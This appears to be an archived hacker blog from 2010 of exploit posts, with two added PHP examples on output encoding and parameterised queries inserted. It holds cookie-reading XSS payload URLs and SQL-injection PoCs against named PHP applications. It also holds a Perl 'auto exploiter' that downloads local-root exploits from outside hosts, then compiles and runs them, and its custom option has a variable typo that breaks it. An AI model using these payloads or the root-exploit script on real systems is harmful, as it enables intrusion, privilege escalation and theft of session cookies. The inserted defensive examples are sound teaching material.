Simple PHP Blog Cross Site Scripting Exploit

Posted in Exploits on January 12, 2010 by Sora

# Exploit Title: Simple PHP Blog Cross Site Scripting Exploit
# Date: January 12th, 2010
# Author: Sora
# Software Link: http://www.sourceforge.net/projects/sphpblog/files/SimplePHPBlog%20%28Beta%29/0.5.1/sphpblog_0511.zip/download
# Version: v5.11
# Tested on: Windows Vista

————————————
> Simple PHP Blog Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Simple PHP Blog suffers from a remote cross site scripting vulnerability in the parameter ‘q’ of search.php.

# Proof of Concept: http://127.0.0.1/blog/search.php?q="><H2>Hacked by Sora</H2><script>alert(document.cookie)</script>

Calendar Express 2 Cross Site Scripting Exploit

Posted in Exploits on January 12, 2010 by Sora

# Exploit Title: Calendar Express 2 Cross Site Scripting Exploit
# Date: January 11th, 2010
# Author: Sora
# Version: 2.0
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Calendar Express 2 XSS Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Calendar Express 2 suffers from a remote cross site scripting vulnerability in search.php, in the parameter “allwords”,
due to unsanitized inputs.

# Proof of Concept:
http://server/iwcalendar/search.php?allwords="><script>alert(document.cookie)</script><H2>Hacked by Sora</h2>&oneword=&cid=3&catid=3

[ Greetz: ]

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 (Origin) # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

Be sure to visit cyber-sec.org and greyhathackers.wordpress.com!

[ ------------------ EOF ------------------ ]

[cyber-sec.org auto exploiter]

Posted in Tools on January 10, 2010 by Sora

#!/usr/bin/perl -w

################################################################################################################
#              ___.                                                                                            #
#  ____ ___.__.\_ |__   ___________            ______ ____   ____                                              #
#_/ ___<   |  | | __ \_/ __ \_  __ \  ______  /  ___// __ \_/ ___\ [-- created by Sora --]                     #
#\  \___\___  | | \_\ \  ___/|  | \/ /_____/  \___ \\  ___/\  \___ [-- https://greyhathackers.wordpress.com/ --]#
# \___  > ____| |___  /\___  >__|            /____  >\___  >\___  >[-- http://www.cyber-sec.org/ --]           #
#     \/\/          \/     \/    auto exploit execute\/     \/     \/                                          #
################################################################################################################

print "[ cyber-sec.org auto exploit execution created by Sora ]\n";
print "[ http://www.greyhathackers.wordpress.com/ ]\n";
print "[ http://www.cyber-sec.org/ ]\n";

print "---------------------\n";
print " Menu:\n";
print " 1. h00lyshit.c\n";
print " 2. ImpelDown.c\n";
print " 3. Custom exploit\n";
print "---------------------\n";
$exploit = <STDIN>;
if ($exploit==1){&shit}
if ($exploit==2){&impel}
if ($exploit==3){&custom}

sub shit
{
print "[+] downloading h00lyshit.c...\n";
system ("cd /tmp/;mkdir exploits;chmod 777 exploits;cd exploits;wget www.xfocus.com/tools/200607/h00lyshit.c;chmod 777 h00lyshit.c;gcc h00lyshit.c -o h00lyshit;dd if=/dev/urandom of=largefile count=2M");
print "[+] executing h00lyshit...\n";
system ("./h00lyshit largefile");
print "[+] executed h00lyshit\n";
}

sub impel
{
print "[+] downloading ImpelDown.c...\n";
system ("cd /tmp/;mkdir exploits;chmod 777 exploits;cd exploits;wget www.packetstormsecurity.org/0911-exploits/ImpelDown.c;chmod 777 ImpelDown.c;gcc ImpelDown.c -o impeldown");
print "[+] executing ImpelDown...\n";
system ("./impeldown");
print "[+] executed ImpelDown\n";
}

sub custom
{
print "[+] site directory:\n";
$userdir = <STDIN>;
print "[+] localroot name:\n";
$localrootname = <STDIN>;
if (-x "/usr/bin/wget"){
system ("cd /tmp/;mkdir s0ra;chmod 777 s0ra;cd s0ra;wget $userinfo;chmod 777 $localrootname;./$localrootname");
print "[+] successfully executed custom exploit!\n";
system ("whoami");
}

}

[cyber-sec.org] file info grabber

Posted in Tools on January 9, 2010 by Sora

File Info Grabber [cyber-sec.org]
Author: Sora
Contact: vhr95zw [at] hotmail [dot] com
Website: https://greyhathackers.wordpress.com/


s0ra@sora-desktop:$ cat about.txt
[ > File Info Grabber - created for cyber-sec.org! < ]

[--------------------- EOF ---------------------]

Download link: http://rapidshare.com/files/332431533/_cyber-sec.org__File_info_grabber_-_Sora.rar

Sniggabo CMS v2.21 XSS Vulnerability

Posted in Exploits on January 7, 2010 by Sora

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# Description:
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter
‘q’ of search.php.

# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%3C/h1%3E%3Chr%3Eh4x3d%20-%20https://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #
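
The three search.php reports above (parameters ‘q’ and “allwords”) describe the same flaw: a query-string value is written back into the page without output encoding. The following is an added example, not code from Simple PHP Blog, Calendar Express or Sniggabo CMS; the function names and the markup are assumptions made for illustration.

```php
<?php
// Hypothetical search.php fragment (added illustration, not any project's source).

// Vulnerable pattern: the raw value lands inside an attribute, so a value
// containing "> closes the attribute and the tag, and the rest is parsed as markup.
function render_search_box_vulnerable(string $q): string
{
    return '<input type="text" name="q" value="' . $q . '">';
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_box(string $q): string
{
    return '<input type="text" name="q" value="' . h($q) . '">';
}

function render_results_heading(string $q): string
{
    return '<h2>Results for ' . h($q) . '</h2>';
}

// Constructed sample input with the same shape as the PoC strings on this page.
$q = $_GET['q'] ?? '"><script>alert(document.cookie)</script>';
if (!is_string($q)) {
    $q = '';   // ?q[]=x arrives as an array, not a string
}

// Defence in depth: a restrictive CSP blocks inline script even if an
// encoding call is missed somewhere else in the template.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('X-Content-Type-Options: nosniff');

echo render_search_box($q), "\n";       // value="&quot;&gt;&lt;script&gt;..."
echo render_results_heading($q), "\n";  // markup characters shown as text
```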

Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability

Posted in Exploits on January 7, 2010 by Sora

# Exploit Title: Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: 2.6.1
# Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3)
——————————
> Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# VULNERABILITY DESCRIPTION:
Type: SQL Injection
Level: 4/5 (CRITICAL)

Sora has advised that Ulisse’s ladder.php file from Ulisse’s Scripts 2.6.1
suffers a remote SQL injection vulnerability in the parameter ‘gid’. The database inputs
are not properly sanitized.

# VULNERABILITY SOLUTION:
Sanitize the database inputs in the file ladder.php.

# Proof of Concept: http://www.site.com/ulisse/ladder.php?gid=1'

My Gaming Ladder v1.0 SQL Injection Vulnerability

Posted in Exploits on January 5, 2010 by Sora

# Exploit Title: My Gaming Ladder SQL Injection Vulnerability
# Date: January 4th, 2009
# Author: Sora
# Software Link: http://www.mygamingladder.com/
# Version: 1.0
# Tested on: Windows and Linux
———————————–
> MyGamingLadder SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”
> Cost of the program: $190.00 (wow!)

# Vulnerability Description:
My Gaming Ladder v1.0 suffers a remote SQL injection vulnerability in
the parameter “ladderid=” of ladder.php. The attacker can gain user credentials and deface
the vulnerable website. They will either infect the website, or they will deface it.

# Proof of Concept:

http://www.test.info/mgl/ladder.php?ladderid=3'
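
Both ladder.php reports above (parameters ‘gid’ and “ladderid”) involve a numeric identifier reaching a SQL statement unchecked. The following is an added example of the fix, not code from Ulisse's Scripts or My Gaming Ladder; the table, column and function names are assumptions, and the in-memory SQLite database holds constructed rows so the script runs on its own.

```php
<?php
// Hypothetical ladder.php lookup (added illustration, not either project's source).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ladders (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO ladders (id, name) VALUES (1, 'Constructed ladder A'), (3, 'Constructed ladder B')");

// Vulnerable pattern, shown only as a comment and never executed here:
//   "SELECT name FROM ladders WHERE id = " . $_GET['gid']
// A trailing ' in the parameter then changes the statement's syntax.

// Step 1: strict validation. The identifier must be a positive integer.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;                       // arrays such as ?gid[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Step 2: parameterised query. The value is bound, never concatenated.
function find_ladder(PDO $db, $raw): ?string
{
    $id = parse_id($raw);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT name FROM ladders WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Constructed inputs: a valid id, the quoted form from the PoC, a negative
// number and an array parameter.
foreach (['3', "3'", '-1', ['3']] as $raw) {
    $shown  = is_string($raw) ? $raw : gettype($raw);
    $result = find_ladder($db, $raw);
    echo str_pad($shown, 8), ' => ', $result ?? 'rejected or not found', "\n";
}
```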
